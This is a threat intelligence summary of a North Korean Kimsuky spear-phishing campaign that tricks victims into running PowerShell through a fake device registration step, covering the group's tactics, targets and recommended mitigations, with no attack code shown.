Full Report
North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired from the now widespread ClickFix campaigns. [...]
Analysis Summary
# Threat Actor: DPRK Hackers (Likely Kimsuky)
## Attribution & Identity
The threat actors are linked to the Democratic People's Republic of Korea (DPRK). Microsoft associates this specific tactic (spear-phishing leading to PowerShell execution) with the threat group **Kimsuky**. The operators are observed masquerading as South Korean government officials to build trust with targets.
## Activity Summary
The actors utilize spear-phishing emails containing a PDF attachment. If the victim attempts to read the document, they are redirected to a fake device registration link. This link then instructs the victim to execute attacker-provided PowerShell commands with administrator privileges. This process ultimately installs a browser-based remote desktop tool and registers the victim's device with a remote server, enabling the attacker to gain direct access for data exfiltration. Limited-scope attacks using this tactic were observed starting in January 2025.
## Tactics, Techniques & Procedures
- **Social Engineering/Spear-phishing:** Sending targeted emails with PDF attachments.
- **Deceptive User Prompts:** Directing victims to run malicious code via fake device registration steps.
- **Command Execution:** Tricking victims into manually executing attacker-provided PowerShell scripts using administrator rights.
- **Initial Access/Execution:** Execution leads to the installation of a browser-based remote desktop tool.
- **Persistence/Control:** Registering the victim’s device with a remote server to achieve direct command and control or access.
- **Data Exfiltration:** The ultimate goal enabled by granting remote access.
- **TTP Note:** The article notes this tactic aligns with "ClickFix" methodologies, often associated with nation-state actors like Kimsuky.
## Targeting
- **Sectors:** International affairs organizations, NGOs, government agencies, and media companies.
- **Geography:** North America, South America, Europe, and East Asia.
- **Victims:** Individuals working within the targeted sectors of the mentioned regions.
## Tools & Infrastructure
- **Malware families used:** Browser-based remote desktop tool (specific name not detailed).
- **Infrastructure:** A remote server used for device registration.
- **Hardcoded PIN:** Used during the certificate download phase for device registration.
## Implications
This represents a 'new approach' by DPRK-linked actors targeting traditional espionage victims. The reliance on making the victim execute administrative PowerShell commands via social engineering (a form of living-off-the-land technique combined with user coercion) is effective as it bypasses traditional network defenses for initial execution, relying solely on a successful social engineering context.
## Mitigations
- Treat all unsolicited communications, especially those containing attachments or directing to external link verification processes, with extreme caution.
- Users must be warned never to copy and paste code (especially scripts/PowerShell) found online into an administrative terminal session unless the source and action are fully verified and trusted.
- Harden endpoints against unauthorized remote access tool installation and suspicious PowerShell executions, particularly when executed by standard users elevated to administrator context.